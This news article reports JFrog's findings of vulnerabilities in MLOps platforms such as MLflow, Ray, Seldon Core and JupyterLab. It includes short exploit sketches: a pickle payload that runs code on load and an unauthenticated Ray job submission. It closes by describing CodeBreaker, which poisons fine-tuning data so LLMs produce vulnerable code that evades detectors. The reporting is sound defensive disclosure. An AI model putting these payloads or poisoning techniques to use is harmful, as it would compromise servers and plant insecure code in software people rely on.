Researchers Uncover More Than 20 Supply Chain Vulnerabilities in MLOps Platforms

Cybersecurity researchers are warning about security risks in the machine learning (ML) software supply chain after uncovering more than 20 vulnerabilities that could be exploited to target MLOps platforms.


These vulnerabilities, described as intrinsic and implementation-based flaws, could have severe consequences, ranging from arbitrary code execution to the loading of malicious datasets.

MLOps platforms offer the ability to design and execute an ML model pipeline, with a model registry acting as a repository used to store and version trained ML models. These models can then be embedded within an application or made available to other clients via an API (also known as model-as-a-service).
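For instance, with MLflow, one popular registry (and assuming a tracking server is already configured), the register-then-serve flow looks roughly like the sketch below; the run ID and model name are placeholders:

```python
import mlflow
import mlflow.pyfunc
import pandas as pd

# Register a trained model under a versioned name in the registry
# (the run ID and model name here are placeholders).
mlflow.register_model("runs:/abc123def456/model", "fraud-detector")

# A consumer later resolves a specific version from the registry and
# serves it behind an API (model-as-a-service).
model = mlflow.pyfunc.load_model("models:/fraud-detector/1")
print(model.predict(pd.DataFrame({"amount": [42.0]})))
```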

“Intrinsic vulnerabilities are vulnerabilities that arise from the fundamental formats and processes utilized in the target technology,” stated researchers at JFrog in an extensive report.

Examples of intrinsic vulnerabilities include abusing ML models to run attacker-chosen code by taking advantage of the fact that some model formats support automatic code execution upon loading (for example, Pickle model files).
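A minimal sketch of why Pickle-based model files are dangerous: Python's pickle protocol lets an object specify, via `__reduce__`, a callable to invoke during deserialization, so simply loading the file is enough to run attacker code.

```python
import os
import pickle

class MaliciousModel:
    # pickle invokes __reduce__ when serializing; the callable it returns
    # is executed automatically when the file is later deserialized.
    def __reduce__(self):
        return (os.system, ("echo payload ran at load time",))

payload = pickle.dumps(MaliciousModel())

# Victim side: merely loading the "model" runs the attacker's command.
pickle.loads(payload)
```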

This behavior also extends to specific dataset formats and libraries that allow automatic code execution, potentially leading to malware attacks when merely loading a dataset that is publicly available.
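On the defensive side, some loaders can be told to skip code execution entirely. For example, recent PyTorch releases accept a `weights_only` flag that restricts deserialization to raw tensors (the file name below is a placeholder):

```python
import torch

# A plain torch.load() unpickles the file and can therefore execute
# embedded code. Restricting the load to raw tensors blocks that path
# (weights_only is available in recent PyTorch releases).
state_dict = torch.load("downloaded_model.pt", weights_only=True)
```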

Another case of intrinsic vulnerability concerns JupyterLab (previously Jupyter Notebook), a web-based interactive computational environment that permits users to run blocks (or cells) of code and view the corresponding results.

“An intrinsic matter that many are unaware of relates to the handling of HTML output when executing code blocks in Jupyter,” noted the researchers. “The output of your Python code could emit HTML and [JavaScript], which will be rendered by your browser.”
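The quoted behavior is easy to reproduce with standard IPython display utilities; running something like the following in a cell hands the script straight to the browser:

```python
from IPython.display import HTML, display

# Any HTML a cell emits, <script> tags included, is handed to the
# browser to render. Where that output is not sandboxed from the
# notebook page itself, the script runs with the notebook's privileges.
display(HTML("<script>console.log('output JavaScript executed');</script>"))
```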

The issue is that the JavaScript output is not sandboxed from the parent web application when it runs, meaning it can drive the notebook itself, including making it execute arbitrary Python code automatically.

In other words, an attacker could craft malicious JavaScript that inserts a new cell into the current JupyterLab notebook, injects Python code into it, and then executes it. This is especially relevant in cases where an attacker can exploit a cross-site scripting (XSS) vulnerability.

To that end, JFrog said it discovered an XSS flaw in MLflow (CVE-2024-27132, CVSS score: 7.5) stemming from a lack of sanitization when running an untrusted recipe, resulting in client-side code execution in JupyterLab.
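The risky pattern behind the finding, as described, is running a recipe fetched from an untrusted source inside a notebook. A rough sketch of what that could look like, with a hypothetical repository URL (`Recipe` ships with MLflow 2.x):

```python
# Inside a Jupyter cell: fetch and run a recipe from an untrusted
# repository (URL is hypothetical). Per the report, the recipe's output
# was rendered as HTML without sanitization, enabling the XSS.
!git clone https://github.com/attacker/untrusted-recipe.git
%cd untrusted-recipe

from mlflow.recipes import Recipe

recipe = Recipe(profile="local")
recipe.run()
```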

“A key lesson we’ve learned from this research is that all XSS vulnerabilities in ML libraries should be treated as potential arbitrary code execution, given that data scientists may utilize these ML libraries with Jupyter Notebook,” the researchers emphasized.

The second category of flaws concerns implementation weaknesses, such as a lack of authentication in MLOps platforms, which could allow a threat actor with network access to obtain code execution by abusing the ML Pipeline feature.

These threats are not theoretical: financially motivated attackers have already abused such loopholes, as seen with unpatched Anyscale Ray installations (CVE-2023-48022, CVSS score: 9.8), to deploy cryptocurrency miners.
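In Ray's case, the exposed dashboard's Jobs API accepts job submissions without credentials, so exploitation amounts to a single HTTP request; a sketch of the pattern, with a placeholder host:

```python
import requests

# ShadowRay-style abuse of an exposed Ray dashboard (CVE-2023-48022):
# the Jobs API accepts submissions without authentication, so the
# entrypoint command runs on the cluster. The host is a placeholder.
resp = requests.post(
    "http://ray-head.example.internal:8265/api/jobs/",
    json={"entrypoint": "echo any shell command runs here"},
)
print(resp.status_code, resp.text)
```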

Another type of implementation vulnerability is a container escape targeting Seldon Core that enables attackers to go beyond code execution, move laterally across the cloud environment, and access other users' models and datasets by uploading a malicious model to the inference server.

Chained together, these vulnerabilities could allow threat actors not only to infiltrate and spread inside an organization, but also to compromise its servers.

“If you are deploying a platform that allows for model serving, it is important to realize that anyone who can serve a new model can also execute arbitrary code on that server,” highlighted the researchers. “Ensure that the environment running the model is completely isolated and secure against a container escape.”
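What that isolation can look like in practice, assuming a Kubernetes deployment: a hardened security context for the serving container, sketched here with the official Kubernetes Python client (the image name is a placeholder):

```python
from kubernetes import client

# One hardening layer among several for a model-serving workload: run
# unprivileged, with a read-only filesystem, no Linux capabilities, and
# no privilege escalation, so code execution inside the container is
# harder to turn into an escape.
container = client.V1Container(
    name="model-server",
    image="registry.example.com/model-server:latest",
    security_context=client.V1SecurityContext(
        run_as_non_root=True,
        allow_privilege_escalation=False,
        read_only_root_filesystem=True,
        capabilities=client.V1Capabilities(drop=["ALL"]),
    ),
)
```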

The disclosure comes as Palo Alto Networks Unit 42 detailed two now-patched vulnerabilities in the open-source LangChain generative AI framework (CVE-2023-46229 and CVE-2023-44467) that could have allowed attackers to execute arbitrary code and access sensitive data, respectively.

Trail of Bits also recently uncovered issues in Ask Astro, an open-source chatbot application built on retrieval augmented generation (RAG), that pose risks such as chatbot output manipulation, inaccurate document ingestion, and potential denial-of-service (DoS).

Just as security issues are being exposed in AI-powered applications, techniques are also being devised to poison training datasets with the goal of tricking large language models (LLMs) into producing vulnerable code.

“In contrast to recent attacks that include malicious payloads in detectable or irrelevant sections of the code (e.g., comments), CodeBreaker utilizes LLMs (for instance, GPT-4) for advanced payload transformation (without affecting functionalities), ensuring that both the poisoned data for fine-tuning and generated code can bypass strong vulnerability detection mechanisms,” a group of researchers from the University of Connecticut said.
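As a toy illustration of the idea (not CodeBreaker's actual transformation), a poisoned sample can assemble an insecure call at runtime so a pattern-based scanner never sees the telltale identifier:

```python
import hashlib

# Toy illustration of payload transformation: the insecure MD5 call is
# assembled at runtime, so a static scanner grepping for "md5" in the
# poisoned sample or the generated code never sees the literal name.
algo = "".join(["m", "d", "5"])
digest = getattr(hashlib, algo)(b"password").hexdigest()
print(digest)
```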
